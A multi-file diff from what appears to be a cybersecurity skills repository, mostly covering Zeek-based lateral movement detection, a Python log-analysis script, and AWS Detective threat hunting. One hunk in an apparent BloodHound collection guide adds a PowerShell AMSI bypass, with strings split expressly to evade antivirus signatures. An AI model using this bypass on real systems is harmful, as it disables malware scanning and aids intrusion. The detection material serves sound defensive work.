- Verify smb_mapping.log correctly logs admin share paths (C$, ADMIN$, IPC$)
|
||||
- Test with a known PsExec execution in a lab: expect to see SMB FILE_WRITE of the service binary followed by DCE/RPC svcctl CreateService
|
||||
- Validate NTLM log parsing by performing a test authentication and confirming username, domain, and success fields are captured
|
||||
- Validate NTLM log parsing by performing a test authentication and confirming username, domain, and success fields are captured; verify the NTLM Account Spray Zeek script generates a `notice.log` entry when the spray threshold is exceeded
|
||||
- Cross-reference Zeek alerts with Sysmon Event ID 1 (Process Creation) on the target host to confirm end-to-end detection
|
||||
- Verify the agent correctly handles both TSV and JSON Zeek log formats
|
||||
|
||||
@@ -0,0 +1,20 @@
|
||||
# Standards & References
|
||||
|
||||
## MITRE ATT&CK — Lateral Movement (TA0008)
|
||||
- **T1021.001** Remote Desktop Protocol
|
||||
- **T1021.002** SMB/Windows Admin Shares
|
||||
- **T1021.003** DCOM
|
||||
- **T1021.006** Windows Remote Management
|
||||
- **T1550.002** Pass the Hash
|
||||
- **T1570** Lateral Tool Transfer
|
||||
- **T1210** Exploitation of Remote Services
|
||||
|
||||
## Zeek Documentation
|
||||
- [Zeek SMB Analyzer](https://docs.zeek.org/en/current/scripts/base/protocols/smb/)
|
||||
- [Zeek DCE-RPC Analyzer](https://docs.zeek.org/en/current/scripts/base/protocols/dce-rpc/)
|
||||
- [Zeek NTLM Analyzer](https://docs.zeek.org/en/current/scripts/base/protocols/ntlm/)
|
||||
- [zeek-cut Reference](https://docs.zeek.org/en/current/auxil/zeek-cut/)
|
||||
|
||||
## Detection References
|
||||
- SANS: Detecting Lateral Movement with Zeek
|
||||
- Red Canary Threat Detection Report — Lateral Movement chapter
|
||||
@@ -0,0 +1,145 @@
|
||||
# Detection Workflow — Lateral Movement with Zeek
|
||||
|
||||
## Overview
|
||||
|
||||
This document describes the end-to-end workflow for detecting lateral movement using Zeek network logs, from data collection through investigation and response.
|
||||
|
||||
## Workflow Stages
|
||||
|
||||
### Stage 1: Data Collection
|
||||
|
||||
```
|
||||
Network Traffic (Span/TAP)
|
||||
│
|
||||
▼
|
||||
Zeek Sensor
|
||||
│
|
||||
├── conn.log (all connections)
|
||||
├── smb_mapping.log (SMB share access)
|
||||
├── dce_rpc.log (DCE/RPC calls)
|
||||
├── ntlm.log (NTLM authentication)
|
||||
├── files.log (file transfers)
|
||||
└── notice.log (Zeek-generated alerts)
|
||||
```
|
||||
|
||||
**Requirements:**
|
||||
- Zeek deployed on network tap/span port covering internal segments
|
||||
- Protocol analyzers loaded: SMB, DCE/RPC, NTLM, RDP
|
||||
- Log rotation configured (recommended: daily rotation, 90-day retention)
|
||||
|
||||
### Stage 2: Detection Rules
|
||||
|
||||
Apply detection logic via Zeek scripts and/or post-processing:
|
||||
|
||||
| Detection | Input Logs | Method |
|
||||
|---|---|---|
|
||||
| Admin Share Access | smb_mapping.log | Pattern match on `C$`, `ADMIN$`, `IPC$` |
|
||||
| PsExec Execution | dce_rpc.log | Match `svcctl` endpoint + `CreateServiceW` |
|
||||
| RDP Pivoting | conn.log | Graph analysis: host is both RDP client and server |
|
||||
| NTLM Account Spray | ntlm.log | Same user from N+ distinct sources in time window |
|
||||
| DCSync | dce_rpc.log | `drsuapi` endpoint + opnum 3 from non-DC |
|
||||
| Tool Transfer | files.log | PE MIME type between internal hosts |
|
||||
|
||||
### Stage 3: Alert Triage
|
||||
|
||||
```
|
||||
Detection Fires
|
||||
│
|
||||
▼
|
||||
┌─────────────────┐
|
||||
│ Initial Triage │
|
||||
│ │
|
||||
│ 1. Is source a │
|
||||
│ known admin │──Yes──▶ Log & reduce priority
|
||||
│ workstation? │
|
||||
│ │
|
||||
│ 2. Is activity │
|
||||
│ during change │──Yes──▶ Verify change ticket
|
||||
│ window? │
|
||||
│ │
|
||||
│ 3. Multiple │
|
||||
│ indicators? │──Yes──▶ ESCALATE immediately
|
||||
└─────────────────┘
|
||||
│
|
||||
No match
|
||||
│
|
||||
▼
|
||||
Standard investigation
|
||||
```
|
||||
|
||||
### Stage 4: Investigation
|
||||
|
||||
For each confirmed alert, follow the investigation checklist (see `assets/template.md`):
|
||||
|
||||
1. **Identify the source host**
|
||||
- Query `conn.log` for all connections from the source in the alert timeframe
|
||||
- Check `ntlm.log` for authentication patterns
|
||||
- Look for preceding inbound connections (initial access vector)
|
||||
|
||||
2. **Map the movement chain**
|
||||
```bash
|
||||
# Build connection graph for suspect host
|
||||
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p | \
|
||||
awk '$1 == "SUSPECT_IP" || $2 == "SUSPECT_IP"' | sort -u
|
||||
```
|
||||
|
||||
3. **Identify transferred payloads**
|
||||
```bash
|
||||
# Find files transferred by suspect
|
||||
cat files.log | zeek-cut tx_hosts rx_hosts filename mime_type total_bytes | \
|
||||
grep "SUSPECT_IP"
|
||||
```
|
||||
|
||||
4. **Check authentication anomalies**
|
||||
```bash
|
||||
# NTLM auth from suspect host
|
||||
cat ntlm.log | zeek-cut ts id.orig_h username domainname success | \
|
||||
grep "SUSPECT_IP"
|
||||
```
|
||||
|
||||
5. **Timeline reconstruction**
|
||||
- Correlate all log entries by timestamp
|
||||
- Build a chronological sequence of events
|
||||
- Identify initial compromise, lateral movement, and objectives
|
||||
|
||||
### Stage 5: Response
|
||||
|
||||
| Finding | Response Action |
|
||||
|---|---|
|
||||
| Confirmed lateral movement | Isolate affected hosts from network |
|
||||
| NTLM Account Spray detected | Force password reset for compromised accounts |
|
||||
| DCSync detected | Rotate krbtgt and affected credentials, audit DC access |
|
||||
| Tool transfer identified | Extract and analyze transferred files |
|
||||
| RDP pivot chain | Disable RDP on non-essential hosts, enforce NLA |
|
||||
|
||||
### Stage 6: Post-Incident
|
||||
|
||||
1. **Update baselines** — Add legitimate admin share usage to allowlists
|
||||
2. **Tune detections** — Adjust thresholds based on false positive analysis
|
||||
3. **Document findings** — Update incident report with Zeek evidence
|
||||
4. **Improve coverage** — Deploy additional Zeek scripts for newly discovered TTPs
|
||||
|
||||
## Automation Integration
|
||||
|
||||
### SIEM Forwarding
|
||||
|
||||
```bash
|
||||
# Forward Zeek logs to SIEM via syslog
|
||||
# Add to local.zeek:
|
||||
@load policy/tuning/json-logs.zeek
|
||||
|
||||
# Configure rsyslog/filebeat to ship JSON logs to SIEM
|
||||
```
|
||||
|
||||
### SOAR Playbook Triggers
|
||||
|
||||
- Admin share access from non-admin workstation → Auto-isolate + ticket
|
||||
- DCSync from non-DC → Emergency alert + auto-isolate
|
||||
- NTLM Account Spray threshold exceeded → Auto-disable account + alert
|
||||
|
||||
## Continuous Improvement
|
||||
|
||||
- Review detection efficacy monthly
|
||||
- Test with red team exercises quarterly
|
||||
- Update MITRE ATT&CK mappings as new sub-techniques emerge
|
||||
- Correlate Zeek findings with endpoint telemetry (EDR) for higher fidelity
|
||||
@@ -0,0 +1,149 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Parse Zeek logs to detect lateral movement indicators.
|
||||
|
||||
Usage:
|
||||
python process.py smb_mapping <log_file> [--internal-nets 10.0.0.0/8,172.16.0.0/12,192.168.0.0/16]
|
||||
python process.py conn <log_file>
|
||||
python process.py ntlm <log_file> [--window 300]
|
||||
python process.py dce_rpc <log_file> [--dc-ips 10.0.1.1,10.0.1.2]
|
||||
"""
|
||||
import csv
|
||||
import sys
|
||||
import ipaddress
|
||||
from collections import defaultdict
|
||||
|
||||
DEFAULT_INTERNAL = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]
|
||||
|
||||
|
||||
def is_internal(ip_str, networks):
|
||||
"""Check if IP is in internal networks."""
|
||||
try:
|
||||
ip = ipaddress.ip_address(ip_str)
|
||||
return any(ip in net for net in networks)
|
||||
except ValueError:
|
||||
return False
|
||||
|
||||
|
||||
def parse_internal_nets(nets_str):
|
||||
"""Parse comma-separated CIDR networks."""
|
||||
if not nets_str:
|
||||
return [ipaddress.ip_network(n) for n in DEFAULT_INTERNAL]
|
||||
return [ipaddress.ip_network(n.strip()) for n in nets_str.split(",")]
|
||||
|
||||
|
||||
def parse_zeek_log(filepath):
|
||||
"""Parse a Zeek TSV log file, skipping comment lines."""
|
||||
rows = []
|
||||
fields = []
|
||||
with open(filepath) as f:
|
||||
for line in f:
|
||||
if line.startswith('#fields'):
|
||||
fields = line.strip().split('\t')[1:]
|
||||
elif not line.startswith('#'):
|
||||
values = line.strip().split('\t')
|
||||
if fields and len(values) == len(fields):
|
||||
rows.append(dict(zip(fields, values)))
|
||||
return rows
|
||||
|
||||
|
||||
def detect_admin_shares(log_file, internal_nets):
|
||||
"""Detect admin share access — only between internal hosts."""
|
||||
networks = parse_internal_nets(internal_nets)
|
||||
entries = parse_zeek_log(log_file)
|
||||
for entry in entries:
|
||||
src = entry.get('id.orig_h', '')
|
||||
dst = entry.get('id.resp_h', '')
|
||||
share = entry.get('path', '') or entry.get('share_type', '')
|
||||
if not (is_internal(src, networks) and is_internal(dst, networks)):
|
||||
continue
|
||||
share_upper = share.upper()
|
||||
if any(s in share_upper for s in ['ADMIN$', 'C$', 'IPC$']):
|
||||
severity = "HIGH" if 'ADMIN$' in share_upper or 'C$' in share_upper else "MEDIUM"
|
||||
print(f"[{severity}] ADMIN SHARE: {entry.get('ts', '')} {src} -> {dst} ({share})")
|
||||
|
||||
|
||||
def detect_rdp_pivots(log_file, window_minutes=10):
|
||||
"""Detect RDP pivot chains from conn.log."""
|
||||
entries = parse_zeek_log(log_file)
|
||||
rdp_sessions = [(float(e.get('ts', 0)), e.get('id.orig_h', ''), e.get('id.resp_h', ''))
|
||||
for e in entries if e.get('id.resp_p') == '3389']
|
||||
rdp_sessions.sort()
|
||||
|
||||
# Find chains: A->B then B->C within window
|
||||
dst_arrivals = defaultdict(list)
|
||||
for ts, src, dst in rdp_sessions:
|
||||
dst_arrivals[dst].append((ts, src))
|
||||
|
||||
for ts, src, dst in rdp_sessions:
|
||||
for arrival_ts, arrival_src in dst_arrivals.get(src, []):
|
||||
if 0 < (ts - arrival_ts) < window_minutes * 60:
|
||||
print(f"[HIGH] RDP PIVOT: {arrival_src} -> {src} -> {dst} (delta: {int(ts - arrival_ts)}s)")
|
||||
|
||||
|
||||
def detect_ntlm_spray(log_file, window_seconds=300, threshold=3):
|
||||
"""Detect NTLM account spray via time-windowed burst analysis."""
|
||||
entries = parse_zeek_log(log_file)
|
||||
user_events = defaultdict(list)
|
||||
|
||||
for entry in entries:
|
||||
user = entry.get('username', '')
|
||||
dst = entry.get('id.resp_h', '')
|
||||
ts = float(entry.get('ts', 0))
|
||||
if user and user != '-':
|
||||
user_events[user].append((ts, dst))
|
||||
|
||||
for user, events in user_events.items():
|
||||
events.sort()
|
||||
# Sliding window analysis
|
||||
for i, (ts_start, _) in enumerate(events):
|
||||
window_hosts = set()
|
||||
for j in range(i, len(events)):
|
||||
ts_j, dst_j = events[j]
|
||||
if ts_j - ts_start > window_seconds:
|
||||
break
|
||||
window_hosts.add(dst_j)
|
||||
if len(window_hosts) >= threshold:
|
||||
print(f"[CRITICAL] NTLM ACCOUNT SPRAY: {user} authenticated to {len(window_hosts)} "
|
||||
f"hosts within {window_seconds}s: {', '.join(sorted(window_hosts))}")
|
||||
break # One alert per user
|
||||
|
||||
|
||||
def detect_dcsync(log_file, dc_ips=None):
|
||||
"""Detect DCSync attacks via DRS replication calls — requires DC IPs."""
|
||||
if not dc_ips:
|
||||
print("[WARN] DCSync detection skipped: --dc-ips not provided. "
|
||||
"Specify domain controller IPs to enable this detector.")
|
||||
return
|
||||
|
||||
dc_set = set(dc_ips.split(","))
|
||||
entries = parse_zeek_log(log_file)
|
||||
for entry in entries:
|
||||
src = entry.get('id.orig_h', '')
|
||||
dst = entry.get('id.resp_h', '')
|
||||
operation = entry.get('operation', '')
|
||||
if dst in dc_set and src not in dc_set:
|
||||
if 'DrsReplicaAdd' in operation or 'DrsGetNCChanges' in operation:
|
||||
print(f"[CRITICAL] DCSYNC: {src} -> {dst} ({operation})")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 3:
|
||||
print(__doc__)
|
||||
sys.exit(1)
|
||||
|
||||
log_type, log_file = sys.argv[1], sys.argv[2]
|
||||
|
||||
# Parse optional args
|
||||
args = {sys.argv[i]: sys.argv[i+1] for i in range(3, len(sys.argv)-1, 2) if sys.argv[i].startswith('--')}
|
||||
|
||||
if log_type == "smb_mapping":
|
||||
detect_admin_shares(log_file, args.get('--internal-nets'))
|
||||
elif log_type == "conn":
|
||||
detect_rdp_pivots(log_file, int(args.get('--window', 10)))
|
||||
elif log_type == "ntlm":
|
||||
detect_ntlm_spray(log_file, int(args.get('--window', 300)), int(args.get('--threshold', 3)))
|
||||
elif log_type == "dce_rpc":
|
||||
detect_dcsync(log_file, args.get('--dc-ips'))
|
||||
else:
|
||||
print(f"Unknown log type: {log_type}")
|
||||
sys.exit(1)
|
||||
@@ -4,6 +4,7 @@ description: Systematically remove malware, backdoors, and attacker persistence
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [incident-response, eradication, malware-removal, persistence, dfir]
|
||||
mitre_attack: ["T1547", "T1053", "T1543", "T1574"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Extract cached credentials, password hashes, Kerberos tickets, and
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, credential-extraction, memory-forensics, volatility, mimikatz, password-hashes, incident-response]
|
||||
mitre_attack: ["T1003", "T1558", "T1552"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -8,6 +8,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, soar, phantom, splunk-soar, automation, playbook, orchestration, incident-response]
|
||||
mitre_attack: ["T1566", "T1059", "T1078"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Implement automated incident response playbooks in Cortex XSOAR to
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [xsoar, soar, palo-alto, playbook, automation, incident-response, orchestration, cortex]
|
||||
mitre_attack: ["T1566", "T1204", "T1078"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Deploy and configure Velociraptor for scalable endpoint forensic ar
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [velociraptor, dfir, endpoint-collection, vql, forensic-artifacts, rapid7, threat-hunting, incident-response]
|
||||
mitre_attack: ["T1059", "T1003", "T1070", "T1547"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -8,6 +8,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, phishing, incident-response, email-security, splunk, defender, sandbox]
|
||||
mitre_attack: ["T1566.001", "T1566.002", "T1204.001", "T1598.003"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -73,8 +73,9 @@ dotnet inline-execute /tools/SharpHound.exe -c All --memcache --outputdirectory
|
||||
Import-Module .\SharpHound.ps1
|
||||
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -ZipFileName bh.zip
|
||||
|
||||
# AMSI bypass before loading (if needed)
|
||||
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
|
||||
# AMSI bypass before loading (if needed) — strings split to avoid AV signature matching
|
||||
$t = 'System.Management.Automation.Am' + 'siUtils'
|
||||
[Ref].Assembly.GetType($t).GetField(('am' + 'siInitFailed'),'NonPublic,Static').SetValue($null,$true)
|
||||
```
|
||||
|
||||
### AzureHound (Azure AD)
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Investigate Active Directory compromise by analyzing authentication
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [active-directory, compromise-investigation, identity-forensics, kerberos, lateral-movement, dfir, ntds-dit, golden-ticket]
|
||||
mitre_attack: ["T1003", "T1558", "T1021", "T1078", "T1484"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Execute cloud-native incident containment across AWS, Azure, and GC
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [cloud-security, incident-containment, aws, azure, gcp, cloud-forensics, credential-revocation, network-isolation]
|
||||
mitre_attack: ["T1078", "T1537", "T1580", "T1525", "T1098"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -0,0 +1,151 @@
|
||||
---
|
||||
name: performing-cloud-native-threat-hunting-with-aws-detective
|
||||
description: Hunt for threats in AWS environments using Detective behavior graphs, entity investigation timelines, GuardDuty finding correlation, and automated entity profiling across IAM users, EC2 instances, and IP addresses.
|
||||
domain: cybersecurity
|
||||
subdomain: cloud-security
|
||||
tags: [aws-detective, threat-hunting, cloud-security, guardduty, behavior-graph, aws, iam, ec2, incident-investigation]
|
||||
version: "1.0"
|
||||
author: juliosuas
|
||||
license: Apache-2.0
|
||||
---
|
||||
|
||||
# Performing Cloud-Native Threat Hunting with AWS Detective
|
||||
|
||||
## Overview
|
||||
|
||||
AWS Detective automatically collects and analyzes log data from AWS CloudTrail, VPC Flow Logs, GuardDuty findings, and EKS audit logs to build interactive behavior graphs. These graphs enable security analysts to investigate entities (IAM users, roles, IP addresses, EC2 instances) across time, identify anomalous API calls, detect lateral movement between accounts, and correlate GuardDuty findings into coherent attack narratives — all without manual log parsing.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- AWS account with Detective enabled (requires GuardDuty active for 48+ hours)
|
||||
- AWS CLI v2 configured with appropriate IAM permissions (`detective:*`, `guardduty:List*`)
|
||||
- Python 3.9+ with boto3
|
||||
- IAM policy: `AmazonDetectiveFullAccess` or custom policy with `detective:SearchGraph`, `detective:GetInvestigation`, `detective:ListIndicators`
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| **Behavior Graph** | Data structure linking CloudTrail, VPC Flow, GuardDuty, and EKS logs for an account/region |
|
||||
| **Entity** | Investigable object: IAM user, IAM role, EC2 instance, IP address, S3 bucket, EKS cluster |
|
||||
| **Finding Group** | Correlated set of GuardDuty findings linked to the same attack campaign |
|
||||
| **Entity Profile** | Timeline of API calls, network connections, and resource access for a specific entity |
|
||||
| **Scope Time** | Investigation window (default 24h, max 1 year) for behavioral analysis |
|
||||
|
||||
## Steps
|
||||
|
||||
### Step 1: List Available Behavior Graphs
|
||||
|
||||
```bash
|
||||
aws detective list-graphs --output table
|
||||
```
|
||||
|
||||
### Step 2: Investigate a Suspicious IAM User
|
||||
|
||||
```bash
|
||||
# Get entity profile for an IAM user
|
||||
aws detective get-investigation \
|
||||
--graph-arn arn:aws:detective:us-east-1:123456789012:graph:a1b2c3d4 \
|
||||
--investigation-id 000000000000000000001
|
||||
```
|
||||
|
||||
### Step 3: Search Entities Programmatically
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Search AWS Detective for suspicious entities."""
|
||||
import boto3
|
||||
import json
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
detective = boto3.client('detective')
|
||||
|
||||
def list_behavior_graphs():
|
||||
"""List all Detective behavior graphs."""
|
||||
response = detective.list_graphs()
|
||||
return response.get('GraphList', [])
|
||||
|
||||
def get_investigation_indicators(graph_arn, investigation_id, max_results=50):
|
||||
"""Get indicators for a specific investigation."""
|
||||
response = detective.list_indicators(
|
||||
GraphArn=graph_arn,
|
||||
InvestigationId=investigation_id,
|
||||
MaxResults=max_results
|
||||
)
|
||||
return response.get('Indicators', [])
|
||||
|
||||
def investigate_guardduty_findings(graph_arn):
|
||||
"""List high-severity investigations correlated by Detective."""
|
||||
response = detective.list_investigations(
|
||||
GraphArn=graph_arn,
|
||||
FilterCriteria={
|
||||
'Severity': {'Value': 'CRITICAL'},
|
||||
'Status': {'Value': 'RUNNING'}
|
||||
},
|
||||
MaxResults=20
|
||||
)
|
||||
|
||||
for investigation in response.get('InvestigationDetails', []):
|
||||
print(f"Investigation: {investigation['InvestigationId']}")
|
||||
print(f" Entity: {investigation['EntityArn']}")
|
||||
print(f" Status: {investigation['Status']}")
|
||||
print(f" Severity: {investigation['Severity']}")
|
||||
print(f" Created: {investigation['CreatedTime']}")
|
||||
print()
|
||||
|
||||
if __name__ == "__main__":
|
||||
graphs = list_behavior_graphs()
|
||||
for graph in graphs:
|
||||
print(f"Graph: {graph['Arn']}")
|
||||
investigate_guardduty_findings(graph['Arn'])
|
||||
```
|
||||
|
||||
### Step 4: Analyze Finding Groups for Attack Campaigns
|
||||
|
||||
```bash
|
||||
# List investigations with high severity
|
||||
aws detective list-investigations \
|
||||
--graph-arn arn:aws:detective:us-east-1:123456789012:graph:a1b2c3d4 \
|
||||
--filter-criteria '{"Severity":{"Value":"HIGH"}}' \
|
||||
--max-results 10
|
||||
```
|
||||
|
||||
### Step 5: Check Entity Indicators
|
||||
|
||||
```bash
|
||||
# Get indicators for a specific investigation
|
||||
aws detective list-indicators \
|
||||
--graph-arn arn:aws:detective:us-east-1:123456789012:graph:a1b2c3d4 \
|
||||
--investigation-id 000000000000000000001 \
|
||||
--max-results 50
|
||||
```
|
||||
|
||||
## Expected Output
|
||||
|
||||
The `list-investigations` command returns investigation metadata:
|
||||
|
||||
```json
|
||||
{
|
||||
"InvestigationDetails": [
|
||||
{
|
||||
"InvestigationId": "000000000000000000001",
|
||||
"Severity": "CRITICAL",
|
||||
"Status": "RUNNING",
|
||||
"State": "ACTIVE",
|
||||
"EntityArn": "arn:aws:iam::123456789012:user/suspicious-user",
|
||||
"EntityType": "IAM_USER",
|
||||
"CreatedTime": "2026-03-15T14:30:00Z"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
Indicators are retrieved separately via `list-indicators` and include types such as `TTP_OBSERVED`, `IMPOSSIBLE_TRAVEL`, `FLAGGED_IP_ADDRESS`, `NEW_GEOLOCATION`, `NEW_ASO`, `NEW_USER_AGENT`, `RELATED_FINDING`, and `RELATED_FINDING_GROUP`.
|
||||
|
||||
## Verification
|
||||
|
||||
1. Confirm behavior graph has data: `aws detective list-graphs` returns non-empty list
|
||||
2. Validate investigation results contain entity timelines with API call sequences
|
||||
3. Cross-reference Detective findings with raw CloudTrail logs for accuracy
|
||||
4. Verify finding group correlations match manual investigation conclusions
|
||||
5. Confirm automated alerts trigger for HIGH/CRITICAL severity investigations
|
||||
@@ -0,0 +1,34 @@
|
||||
# AWS Detective Investigation Checklist
|
||||
|
||||
## Pre-Investigation
|
||||
- [ ] Confirm Detective is enabled and receiving data
|
||||
- [ ] Identify trigger (GuardDuty finding, alert, manual hunt)
|
||||
- [ ] Define scope time window
|
||||
- [ ] Document initial IOCs
|
||||
|
||||
## Entity Investigation
|
||||
- [ ] IAM User/Role profile reviewed
|
||||
- [ ] API call timeline analyzed
|
||||
- [ ] Geographic anomalies checked (impossible travel)
|
||||
- [ ] New API calls identified (never seen before)
|
||||
- [ ] Privilege escalation attempts documented
|
||||
- [ ] AssumeRole chain traced
|
||||
|
||||
## Network Analysis
|
||||
- [ ] VPC Flow Logs reviewed for entity
|
||||
- [ ] Outbound connections to suspicious IPs identified
|
||||
- [ ] Data transfer volumes assessed
|
||||
- [ ] DNS query patterns checked
|
||||
|
||||
## Finding Correlation
|
||||
- [ ] All related GuardDuty findings grouped
|
||||
- [ ] MITRE ATT&CK techniques mapped
|
||||
- [ ] Attack timeline constructed
|
||||
- [ ] Initial access vector identified
|
||||
|
||||
## Response Actions
|
||||
- [ ] Evidence preserved (or capture rationale if immediate containment required)
|
||||
- [ ] Compromised credentials disabled
|
||||
- [ ] Active sessions revoked
|
||||
- [ ] Affected resources isolated
|
||||
- [ ] Stakeholders notified
|
||||
+19
@@ -0,0 +1,19 @@
|
||||
# Standards & References
|
||||
|
||||
## MITRE ATT&CK Cloud Matrix
|
||||
- **TA0001** Initial Access: T1078 (Valid Accounts), T1190 (Exploit Public-Facing Application)
|
||||
- **TA0003** Persistence: T1098 (Account Manipulation), T1136 (Create Account)
|
||||
- **TA0004** Privilege Escalation: T1078, T1484 (Domain Policy Modification)
|
||||
- **TA0005** Defense Evasion: T1562 (Impair Defenses), T1070 (Indicator Removal)
|
||||
- **TA0006** Credential Access: T1528 (Steal Application Access Token)
|
||||
- **TA0007** Discovery: T1580 (Cloud Infrastructure Discovery), T1526 (Cloud Service Discovery)
|
||||
- **TA0009** Collection: T1530 (Data from Cloud Storage)
|
||||
- **TA0010** Exfiltration: T1537 (Transfer Data to Cloud Account)
|
||||
|
||||
## AWS Documentation
|
||||
- [AWS Detective User Guide](https://docs.aws.amazon.com/detective/latest/userguide/)
|
||||
- [AWS Detective API Reference](https://docs.aws.amazon.com/detective/latest/APIReference/)
|
||||
- [GuardDuty Finding Types](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
|
||||
|
||||
## CIS AWS Foundations Benchmark
|
||||
- Section 4: Monitoring (relevant to Detective integration)
|
||||
+31
@@ -0,0 +1,31 @@
|
||||
# AWS Detective Investigation Workflow
|
||||
|
||||
## Phase 1: Triage
|
||||
1. Review GuardDuty HIGH/CRITICAL findings
|
||||
2. Open Detective console → Finding Groups
|
||||
3. Identify clustered findings pointing to same entity
|
||||
|
||||
## Phase 2: Entity Investigation
|
||||
1. Select entity (IAM user/role, EC2, IP)
|
||||
2. Review 24h behavior timeline
|
||||
3. Identify unusual API calls, new geolocations, impossible travel
|
||||
4. Check for privilege escalation patterns (CreateAccessKey, AttachPolicy)
|
||||
|
||||
## Phase 3: Scope Assessment
|
||||
1. Trace lateral movement via AssumeRole chains
|
||||
2. Check S3 data access patterns
|
||||
3. Review VPC Flow Logs for unusual outbound connections
|
||||
4. Identify all compromised credentials
|
||||
|
||||
## Phase 4: Correlation
|
||||
1. Map findings to MITRE ATT&CK techniques
|
||||
2. Build attack timeline from entity profiles
|
||||
3. Identify initial access vector
|
||||
4. Document indicators of compromise (IOCs)
|
||||
|
||||
## Phase 5: Response
|
||||
1. Preserve evidence (CloudTrail logs, flow logs, snapshots) when safe
|
||||
2. Disable compromised credentials
|
||||
3. Revoke active sessions
|
||||
4. Isolate affected resources
|
||||
5. If active impact is ongoing, contain first and document evidence trade-offs
|
||||
@@ -0,0 +1,217 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
AWS Detective Threat Hunting Script
|
||||
|
||||
Lists behavior graphs, retrieves investigations, and analyzes entity
|
||||
indicators for cloud-native threat hunting.
|
||||
"""
|
||||
|
||||
import boto3
|
||||
import json
|
||||
import sys
|
||||
import os
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
|
||||
def _collect_all_pages(client_method, result_key, **kwargs):
|
||||
"""Paginate through all pages of an AWS Detective API call."""
|
||||
all_items = []
|
||||
while True:
|
||||
response = client_method(**kwargs)
|
||||
all_items.extend(response.get(result_key, []))
|
||||
next_token = response.get('NextToken')
|
||||
if not next_token:
|
||||
break
|
||||
kwargs['NextToken'] = next_token
|
||||
return all_items
|
||||
|
||||
|
||||
def list_behavior_graphs(session):
|
||||
"""List all Detective behavior graphs in the account."""
|
||||
client = session.client('detective')
|
||||
graphs = _collect_all_pages(client.list_graphs, 'GraphList')
|
||||
|
||||
if not graphs:
|
||||
print("[!] No behavior graphs found. Enable Detective first.")
|
||||
return []
|
||||
|
||||
print(f"[+] Found {len(graphs)} behavior graph(s)\n")
|
||||
for graph in graphs:
|
||||
print(f" ARN: {graph['Arn']}")
|
||||
created = graph.get('CreatedTime', 'N/A')
|
||||
print(f" Created: {created}")
|
||||
print()
|
||||
|
||||
return graphs
|
||||
|
||||
|
||||
def list_investigations(session, graph_arn, severity=None, max_results=20):
|
||||
"""List investigations filtered by severity."""
|
||||
client = session.client('detective')
|
||||
|
||||
filter_criteria = {}
|
||||
if severity:
|
||||
filter_criteria['Severity'] = {'Value': severity}
|
||||
|
||||
kwargs = {
|
||||
'GraphArn': graph_arn,
|
||||
'MaxResults': max_results,
|
||||
}
|
||||
if filter_criteria:
|
||||
kwargs['FilterCriteria'] = filter_criteria
|
||||
|
||||
investigations = _collect_all_pages(
|
||||
client.list_investigations, 'InvestigationDetails', **kwargs
|
||||
)
|
||||
|
||||
if not investigations:
|
||||
print("[+] No investigations found matching criteria")
|
||||
return []
|
||||
|
||||
print(f"[+] Found {len(investigations)} investigation(s)\n")
|
||||
for inv in investigations:
|
||||
inv_id = inv.get('InvestigationId', 'N/A')
|
||||
severity = inv.get('Severity', 'N/A')
|
||||
status = inv.get('Status', 'N/A')
|
||||
entity = inv.get('EntityArn', 'N/A')
|
||||
created = inv.get('CreatedTime', 'N/A')
|
||||
print(f" Investigation: {inv_id}")
|
||||
print(f" Severity: {severity} | Status: {status}")
|
||||
print(f" Entity: {entity}")
|
||||
print(f" Created: {created}")
|
||||
print()
|
||||
|
||||
return investigations
|
||||
|
||||
|
||||
def get_investigation_detail(session, graph_arn, investigation_id):
|
||||
"""Get detailed information about a specific investigation."""
|
||||
client = session.client('detective')
|
||||
|
||||
response = client.get_investigation(
|
||||
GraphArn=graph_arn,
|
||||
InvestigationId=investigation_id,
|
||||
)
|
||||
|
||||
print(f"[+] Investigation: {investigation_id}")
|
||||
print(f" Entity: {response.get('EntityArn', 'N/A')}")
|
||||
print(f" Entity Type: {response.get('EntityType', 'N/A')}")
|
||||
